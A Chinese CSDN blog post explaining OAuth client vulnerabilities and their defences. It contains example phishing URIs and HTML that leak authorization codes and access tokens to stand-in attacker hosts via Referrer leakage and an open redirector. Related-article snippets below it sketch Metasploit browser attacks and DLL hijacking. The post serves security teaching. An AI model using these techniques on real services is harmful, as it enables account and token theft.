常见的客户端漏洞

最新推荐文章于 2025-07-18 12:28:48 发布
原创 最新推荐文章于 2025-07-18 12:28:48 发布 · 1.4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #oauth2

本文聚焦OAuth客户端常见安全漏洞。需保护客户端密钥、访问令牌等信息,防止泄露。介绍了针对客户端的CSRF攻击、客户端凭证失窃、通过Referrer盗取授权码、通过开发重定向器盗取令牌等漏洞及防范方法,如使用state参数防CSRF攻击。

常见的客户端漏洞

常规客户端安全

OAuth客户端有几种数据是需要保护的。客户端密钥、访问令牌、刷新令牌这些信息需要妥善保管,同时注意不要意外的将这些保密信息泄露到审计日志或其他记录中。除了存储系统上单纯的信息失窃外,OAuth客户端还可能出现其他类型的漏洞

针对客户端的CSRF攻击

授权码许可和隐式许可类型中推荐使用state参数,OAuth核心规范对该参数的描述如下:

  • 客户端用来维护请求与回调之间状态的不透明值。授权服务器在将用户代理重定向回客户端时包含该值。应该使用这个参数,可以防止CSRF(跨域请求伪造)

SCRF攻击:

  • 恶意应用软件让浏览器向已完成用户身份认证的网站发起请求,执行有害操作,这就是SCRF攻击。为了实施攻击,攻击者可以简单发起一个OAuth流程,从目标授权服务器上获取授权码,然后设法让受害用户的客户端使用攻击者的授权码如
    <img src="https://ouauthclient.com/callback?code=ATTACKER_AUTHORIZATION_CODE">

当用户点击图片,资源拥有者的客户端与攻击者的授权上下文之间建立了联系。如果OAuth协议用于身份认证,将造成灾难性后果。

OAuth客户端对于SCRF攻击可以生成一个难以猜测的state参数,在首次向授权服务器发送请求时将其一同传递,OAuth规范要求授权服务器将此参数原样返回至重定向URI,当重定向URI被调用时,客户端需要检查state参数值,如果不一致,则提示错误

生成的令牌(以及其他不由最终用户处理的凭证)被攻击者猜中的概率必须小于或等于2-128,最好应该小于或等于2-160

客户端凭证失窃

对于原生应用,可以通过动态注册功能,生成客户端密钥、客户端ID。在原生应用首次启动认证时请求注册接口返回客户端ID、客户端密钥,并由客户端保管。

通过Referrer盗取授权码

以授权码许可类型为目标,基于HTTP Referrer造成的信息泄漏,攻击者的最终目的是劫持资源拥有者的授权码。

假设你在一个OAuth提供商那里注册了OAuth客户端,该授权服务使用允许子目录的redirect_uri校验策略。

你的OAuth回调端点是

    https://yourouauthclient.com/oauth/oauthprovider/callback

但你注册的是

    https://yourouauthclient.com/

你的OAuth客户端在执行OAuth授权请求,发起的请求节选可能会是如下这样

    https://oauthprovider.com/authorize?response_type=code&client_id=CLIENT_ID&scope=SCOPES&state=STATE&redirect_uri=https://yourouauthclient.com/

攻击者也要能够在目标站点注册的重定向URI下创建网页

    https://yourouauthclient.com/usergeneratedcontent/attackerpage.html

    <html>
        <h1>Authorization in progress</h1>
        <img src="https://attackersite.com">
    </html>

现在攻击者可以构造一个特殊的钓鱼URI

    https://oauthprovider.com/authorize?response_type=code&client_id=CLIENT_ID&scope=SCOPES&state=STATE&redirect_uri=https://yourouauthclient.com/usergeneratedcontent/attackerpage.html

当用户点击这个钓鱼URI授权服务器将返回授权码到重定向地址,受害者用户浏览器将在后台加载img标签,想攻击者的服务器请求资源,在这个请求中,HTTP Referrer头部会泄露授权码

通过开发重定向器盗取令牌

针对隐式许可类型,攻击目标是访问令牌而不是授权码。开放重定向Web漏洞定义

  • 应用接受一个参数,不进行任何校验就将用户重定向至该参数。这个漏洞被用于钓鱼攻击,让用户不知不觉访问恶意站点。

攻击发生条件

  • 注册了“过于宽松”的redirect_uri
  • 授权服务器采用允许子目录的校验策略
  • OAuth客户端具有开放重定向,如:https://yourouauthclient.com/redirector?goto=http://targetwebsite.com

攻击者可以构建如下URI

    https://oauthprovider.com/authorize?response_type=token&client_id=CLIENT_ID&scope=SCOPES&state=STATE&redirect_uri=https://yourouauthclient.com/redirector?goto=https://attacker.com

如果资源拥有者已经通过TOFU授权应用,或者被说服再次对应用授权,那么资源拥有者的用户代理将被重定向到传入的redirect_uri,并且URI的片段中附有access_token

    https://yourouauthclient.com/redirector?goto=https://attacker.com#access_token=

此时客户端应用中的开发重定向会将代理跳转至攻击者的网站,由于大多数浏览器中,URI片段会在重定向被保留,最终加载页面如下

    https://attacker.com#access_token=
metasploit--- 客户端漏洞利用
孤的博客
11-08 1078
&amp;nbsp; &amp;nbsp; 客户端攻击:首先需要我们对客户端-服务器架构有一个清晰的概念,同时要区分客户端和服务端攻击的不同。服务器是在网络上共享其资源的主机,而客户端则是使用这些资源。客户端攻击仅限于客户端,且攻击目标是运行在这个特定的客户端主机上的有漏洞服务和程序。针对客户端可以发动很多攻击,比如,基于浏览器的攻击以及针对有漏洞服务的漏洞攻击。另外,客户端个操作系统上也会运行一些应用软件,如...
PC客户端(cs架构)渗透测试
06-19
PC客户端(cs架构)渗透测试,本项目主要针对pc客户端(cs架构)渗透测试,结合自身测试经验和网络资料形成checklist,如有任何问题,欢迎联系,期待大家贡献更多的技巧和案例。
客户端应用漏洞挖掘之旅
全粘工程师
12-28 399
2023年12月15日,我有幸参加了由“字节跳动安全中心”举办的“安全范儿”沙龙活动。作为“中孚信息元亨实验室”的一员,我被邀请分享名为“被忽视的暗面:客户端应用漏洞挖掘之旅”的技术议题。现整理成文字版分享出来,由于我不是专门从事二进制工作,因此文章中存在笔误或解释不对的地方,请各位师傅多多包涵!客户端应用漏洞是许多人在进行漏洞挖掘和安全测试时容易忽视的领域。
几个有意思的客户端漏洞
weixin_30685047的博客
03-30 1378
平时测试客户端时发现了几个比较有意思的客户端漏洞,记录一下。 非必要的数据传输 系统登录时,某个数据包会返回系统所有的用户名和加密的MD5密码: 解密以后使用账户密码即可登录任意用户: SQL注入 参数未经过滤直接带入数据库查询: 万能密码登录: 本地静态文件信息泄露 登录成功后,登录的用户名密码会保...
Windows客户端漏洞挖掘(红队角度)
Python_paipai的博客
03-15 1749
虽然这种没有对外监听,但是有命令行或者图形化操作的功能,这种可以针对其程序功能挖掘,思路要打开,用来1Click或者提权等,举个简单的应用,比如某些程序安装之后是以System运行的,此时如果存在RCE或加载DLL的相关操作都是可以用来本地提权的,还有就是有些白签名程序,存在直接RCE或加载DLL都有绕过如某卫士、某擎信任链检测的效果。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
实战介绍Windows下的PC客户端常见漏洞挖掘 - 云+社区 - 腾讯云1
08-03
实战介绍Windows下的PC客户端常见漏洞挖掘 - 云+社区 - 腾讯云实战介绍Windows下的PC客户端常见漏洞挖掘0X00 为什么写这篇文章对于小白来说
15、OAuth 2.0 实战与客户端常见漏洞解析
rgv23456789的博客
07-18 99
本文深入解析了 OAuth 2.0 在实际应用中的常见客户端安全漏洞,包括 CSRF 攻击、客户端凭证被盗以及重定向 URI 注册不当等问题,并提供了具体的防范措施。同时,文章还介绍了 OAuth 2.0 的多种授权类型及其适用场景,强调了安全实现的重要性,为开发人员提供了实用的安全实践建议。
15、OAuth 2.0 客户端安全与常见漏洞防范
最新发布
d6e7f8g9h的博客
07-18 34
本文探讨了 OAuth 2.0 在客户端实际应用中的安全挑战及常见漏洞防范措施。内容涵盖 OAuth 2.0 的使用现状、客户端安全漏洞(如 CSRF 攻击、凭证泄露、重定向 URI 注册问题)及对应的防范策略。同时介绍了 PKCE、动态客户端注册等技术如何提升客户端的安全性,并提供了开发建议和未来展望,以帮助开发者更好地实现安全可靠的 OAuth 2.0 客户端
几个有意思的客户端漏洞 - weixin_30685047的博客 - 优快云博客1
08-03
首先,非必要的数据传输是客户端漏洞的一个常见表现。在系统登录过程中,如果服务器返回了所有用户的用户名和加密的MD5密码,这将构成严重的信息泄露风险。这种情况下,攻击者只需要捕获并解密这些数据,就可以尝试...
精选资源
Web常见十大漏洞.pdf
03-30
Web常见十大漏洞.pdf 在Web应用程序中,安全漏洞是非常常见的问题,以下是Web常见十大漏洞的知识点总结: 一、SQL注入漏洞 SQL注入攻击是Web应用程序中最常见的安全漏洞之一,它是指攻击者通过输入恶意的SQL代码...
Metasploit(六)客户端漏洞
u010680986的博客
09-01 453
浏览器漏洞攻击 1.启动msfconsole,输入use auxiliary/server/browser_autopwn 2.可以通过show options查看需要设置的信息 3.设置参数 set LHOST <target ip> set SRVHOST <ip> setSRVPORT 80 点击run 该模块有个恶意url,即图上最后的using url 被攻击对象的系统上打开该url后,会发送一个反向连接给攻击者的系统,可以看到上...
客户端游戏漏洞看开发中的安全隐患
jlangqi的博客
08-22 2129
本文转自wooyun知识库0x00 前言 虽然现在的应用开发越来越趋向于web应用,大型软件也大量使用了现有的框架,随着现有框架和引擎的完善,绝大多数安全问题已经被解决。但是遇到一些定制需求时,开发人员还是不得不从底层一点点进行设计。这时,没有安全经验的开发人员很容易犯下错误,导致严重的安全隐患。本文以一款自主引擎的大型网络游戏为例,展示开发中容易被忽略的隐患。 Lua作为一种
burpsuite靶场系列之客户端漏洞篇 - 跨站脚本(XSS)专题
weixin_50464560的博客
04-14 3931
https://www.anquanke.com/post/id/245953 本系列介绍 PortSwigger是信息安全从业者必备工具burpsuite的发行商,作为网络空间安全的领导者,他们为信息安全初学者提供了一个在线的网络安全学院(也称练兵场),在讲解相关漏洞的同时还配套了相关的在线靶场供初学者练习,本系列旨在以初学者视角出发对学习该学院内容及靶场练习进行全程记录并为其他初学者提供学习参考,希望能对初学者们有所帮助。 客户端漏洞篇介绍 相对于服务器端漏洞篇,客户端漏洞篇会更加复杂
有道词典pc客户端存在dll劫持漏洞
一只臭皮匠的博客
10-03 2312
1.有道词典下载官网: http://cidian.youdao.com/multi.html#pcAll 2.用Process Explorer查看有道词典YoudaoDict.exe打开调用的dll 3.保存下来整理后 4.然后用工具加载,操作后显示DPAPI.dll和USERENV.dll存在dll劫持 5.把我们的payload.dll改名为DPAPI.dll,放进D:\Dict目录下,打开有道词典发现直接运行了恶意的dll文件,弹出了计算器。 ...
MSF(五):客户端渗透
1stPeak's Blog
02-21 994
客户端渗透 在无法突破网络边界的情况下转而攻击客户端 1、含有漏洞利用代码的WEB站点 利用客户端漏洞 2、社会工程学 直接骗取到敏感信息 含有漏洞利用代码的DOC、PDF等文档或Payload,诱骗被害者执行 3、诱骗被害者执行Payload (windows) 注:msfvenom集合了编码、payload msfvenom --list-options -p windows/she...
计算机漏洞是什么意思/实战介绍Windows下的PC客户端常见漏洞挖掘_零基础白客自学路线
程序员六七的博客
06-02 777
对于小白来说,WEB安全方面似乎已经有了很完备的知识体系和漏洞发掘流程,刚刚入门的朋友总是喜欢选择web方向来作为自己的发展方向
常见漏洞有哪些?如何发现存在的漏洞
a38417的博客
03-28 9813
在目前版本的WindowsXP帮助和支持中心存在漏洞,该漏洞使攻击者可跳过特殊的网页(在打开该网页时,调用错误的函数,并将存在的文件或文件夹的名字作为参数传送)来使上传文件或文件夹的操作失败,随后该网页可在网站上公布,以攻击访问该网站的用户或被作为邮件传播来攻击。攻击者通过构造恶意请求,欺骗服务器发起的请求来访问和操作服务器的内部资源,具体讲就是通过服务器发出网络请求,攻击者控制了服务器发起的请求,包括请求目标、请求方法和请求参数等,目的是绕过访问控制机制,使服务器发起请求到指定目标,而不是合法目标。
演示一个最简单的JavaScript客户端验证的漏洞
交换一个思想,能得到俩思想
05-14 3065
很多时候我们都有JavaScript在客户端做验证,比如必填选项,格式验证等,如果不合法则不让表单提交。但是对于重要的信息如果不在服务器端再做一次验证,是很有风险的。下面的简单示例证明了这一点。 HTML文件如下,页面上有两个文本输入框,一个的id是name,一个id是sechole。JavaScript在客户端对name做检查,简单起见,这里的验证规则是必须填值。验证通过后提交到服务器端的一个
Android 客户端常见漏洞
ting
02-28 1270
一、危险权限 二、组件漏洞 1.拒绝服务 涉及的API:android.content.Intent.get[a-zA-Z]*Extra 原理:本地组件启动时没有对Intent.getXXXExtra()获取或处理的数据进行异常捕获,从而导致攻击者可通过向受害者应用发送空数据、异常或者畸形数据来使该应用crash的目的。 防护:对接收到的任何数据做try catch处理,对于不符合预期的...
windows客户端漏洞
05-12
常见的Windows客户端漏洞包括: 1. 缓冲区溢出:当一个应用程序尝试向一个缓冲区写入比其容量更多的数据时,就会发生缓冲区溢出。攻击者可以利用这种漏洞来执行恶意代码或者破坏程序的正常运行。 2. 输入验证不足...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值